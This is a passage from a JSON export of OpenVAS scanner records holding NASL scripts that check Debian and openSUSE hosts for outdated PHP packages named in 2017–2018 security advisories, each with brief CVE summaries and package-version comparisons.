script_oid(\"1.3.6.1.4.1.25623.1.0.704081\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2017-11142\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11628\", \"CVE-2017-12933\", \"CVE-2017-16642\");\n script_name(\"Debian Security Advisory DSA 4081-1 (php5 - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-08 00:00:00 +0100 (Mon, 08 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4081.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"php5 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), these problems have been fixed\nin version 5.6.33+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/php5\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language:\n\nCVE-2017-11142\nDenial of service via overly long form variables\n\nCVE-2017-11143\nInvalid free() in wddx_deserialize()\n\nCVE-2017-11144\nDenial of service in openssl extension due to incorrect return value\ncheck of OpenSSL sealing function.\n\nCVE-2017-11145\nOut-of-bounds read in wddx_deserialize()\n\nCVE-2017-11628\nBuffer overflow in PHP INI parsing API\n\nCVE-2017-12933\nBuffer overread in finish_nested_data()\n\nCVE-2017-16642\nOut-of-bounds read in timelib_meridian()\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-phpdbg\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-readline\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-07-04T18:56:28", "description": "Several vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language:\n\nCVE-2017-11144\nDenial of service in openssl extension due to incorrect return value\ncheck of OpenSSL sealing function\n\nCVE-2017-11145\nOut-of-bounds read in wddx_deserialize()\n\nCVE-2017-11628\nBuffer overflow in PHP INI parsing API\n\nCVE-2017-12932 /\nCVE-2017-12934\nUse-after-frees during unserialisation\n\nCVE-2017-12933\nBuffer overread in finish_nested_data()\n\nCVE-2017-16642\nOut-of-bounds read in timelib_meridian()", "cvss3": {}, "published": "2018-01-08T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4080-1 (php7.0 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12933", "CVE-2017-12932", "CVE-2017-12934", "CVE-2017-11628", "CVE-2017-16642", "CVE-2017-11145", "CVE-2017-11144"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704080", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704080", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4080-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704080\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11628\", \"CVE-2017-12932\", \"CVE-2017-12933\", \"CVE-2017-12934\", \"CVE-2017-16642\");\n script_name(\"Debian Security Advisory DSA 4080-1 (php7.0 - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-08 00:00:00 +0100 (Mon, 08 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4080.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"php7.0 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 7.0.27-0+deb9u1.\n\nWe recommend that you upgrade your php7.0 packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/php7.0\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language:\n\nCVE-2017-11144\nDenial of service in openssl extension due to incorrect return value\ncheck of OpenSSL sealing function\n\nCVE-2017-11145\nOut-of-bounds read in wddx_deserialize()\n\nCVE-2017-11628\nBuffer overflow in PHP INI parsing API\n\nCVE-2017-12932 /\nCVE-2017-12934\nUse-after-frees during unserialisation\n\nCVE-2017-12933\nBuffer overread in finish_nested_data()\n\nCVE-2017-16642\nOut-of-bounds read in timelib_meridian()\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php7.0\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libphp7.0-embed\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-bcmath\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-bz2\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-cgi\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-cli\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-common\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-curl\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-dba\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-dev\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-enchant\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-fpm\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-gd\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-gmp\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-imap\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-interbase\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-intl\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-json\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-ldap\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-mbstring\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-mcrypt\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-mysql\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-odbc\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-opcache\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-pgsql\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-phpdbg\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-pspell\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-readline\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-recode\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-snmp\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-soap\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-sqlite3\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-sybase\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-tidy\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-xml\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-xmlrpc\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-xsl\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php7.0-zip\", ver:\"7.0.27-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:28:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-09-05T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for php7 (openSUSE-SU-2017:2337-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-10397", "CVE-2017-11146", "CVE-2017-11628", "CVE-2017-11147", "CVE-2016-5766", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851607", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851607", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851607\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-05 07:21:01 +0200 (Tue, 05 Sep 2017)\");\n script_cve_id(\"CVE-2016-10397\", \"CVE-2016-5766\", \"CVE-2017-11142\", \"CVE-2017-11144\",\n \"CVE-2017-11145\", \"CVE-2017-11146\", \"CVE-2017-11147\", \"CVE-2017-11628\",\n \"CVE-2017-7890\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for php7 (openSUSE-SU-2017:2337-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php7'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for php7 fixes the following issues:\n\n - CVE-2016-10397: parse_url() can be bypassed to return fake host.\n (bsc#1047454)\n\n - CVE-2017-11142: Remoteattackers could cause a CPU consumption denial of\n service attack by injectinglong form variables, related to\n main/php_variables. (bsc#1048100)\n\n - CVE-2017-11144: The opensslextension PEM sealing code did not check the\n return value of the OpenSSL sealingfunction, which could lead to a\n crash. (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in timelib_meridian could lead to\n information leak. (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in timelib_meridian parse code\n could lead to information leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by attackers\n supplying malicious archive files to crash the PHP interpreteror\n potentially disclose information. (bsc#1048094)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in zend_ini_do_op() could\n lead to denial of service (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from uninitialized data in\n gdImageCreateFromGifCtx function could lead to denial of service\n (bsc#1050241)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader() resulting in heap\n overflow could lead to denial of service or code execution (bsc#986386)\n\n Other fixes:\n\n - Soap Request with References (bsc#1053645)\n\n - php7-pear should explicitly require php7-pear-Archive_Tar\n otherwise this dependency must be declared in every php7-pear-* package\n explicitly. [bnc#1052389]\n\n This update was imported from the SUSE:SLE-12:Update update project.\");\n\n script_tag(name:\"affected\", value:\"php7 on openSUSE Leap 42.3, openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2337-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.3)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php7\", rpm:\"apache2-mod_php7~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php7-debuginfo\", rpm:\"apache2-mod_php7-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7\", rpm:\"php7~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bcmath\", rpm:\"php7-bcmath~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bcmath-debuginfo\", rpm:\"php7-bcmath-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bz2\", rpm:\"php7-bz2~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bz2-debuginfo\", rpm:\"php7-bz2-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-calendar\", rpm:\"php7-calendar~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-calendar-debuginfo\", rpm:\"php7-calendar-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ctype\", rpm:\"php7-ctype~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ctype-debuginfo\", rpm:\"php7-ctype-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-curl\", rpm:\"php7-curl~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-curl-debuginfo\", rpm:\"php7-curl-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dba\", rpm:\"php7-dba~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dba-debuginfo\", rpm:\"php7-dba-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-debuginfo\", rpm:\"php7-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-debugsource\", rpm:\"php7-debugsource~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-devel\", rpm:\"php7-devel~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dom\", rpm:\"php7-dom~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dom-debuginfo\", rpm:\"php7-dom-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-enchant\", rpm:\"php7-enchant~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-enchant-debuginfo\", rpm:\"php7-enchant-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-exif\", rpm:\"php7-exif~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-exif-debuginfo\", rpm:\"php7-exif-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fastcgi\", rpm:\"php7-fastcgi~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fastcgi-debuginfo\", rpm:\"php7-fastcgi-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fileinfo\", rpm:\"php7-fileinfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fileinfo-debuginfo\", rpm:\"php7-fileinfo-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-firebird\", rpm:\"php7-firebird~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-firebird-debuginfo\", rpm:\"php7-firebird-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fpm\", rpm:\"php7-fpm~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fpm-debuginfo\", rpm:\"php7-fpm-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ftp\", 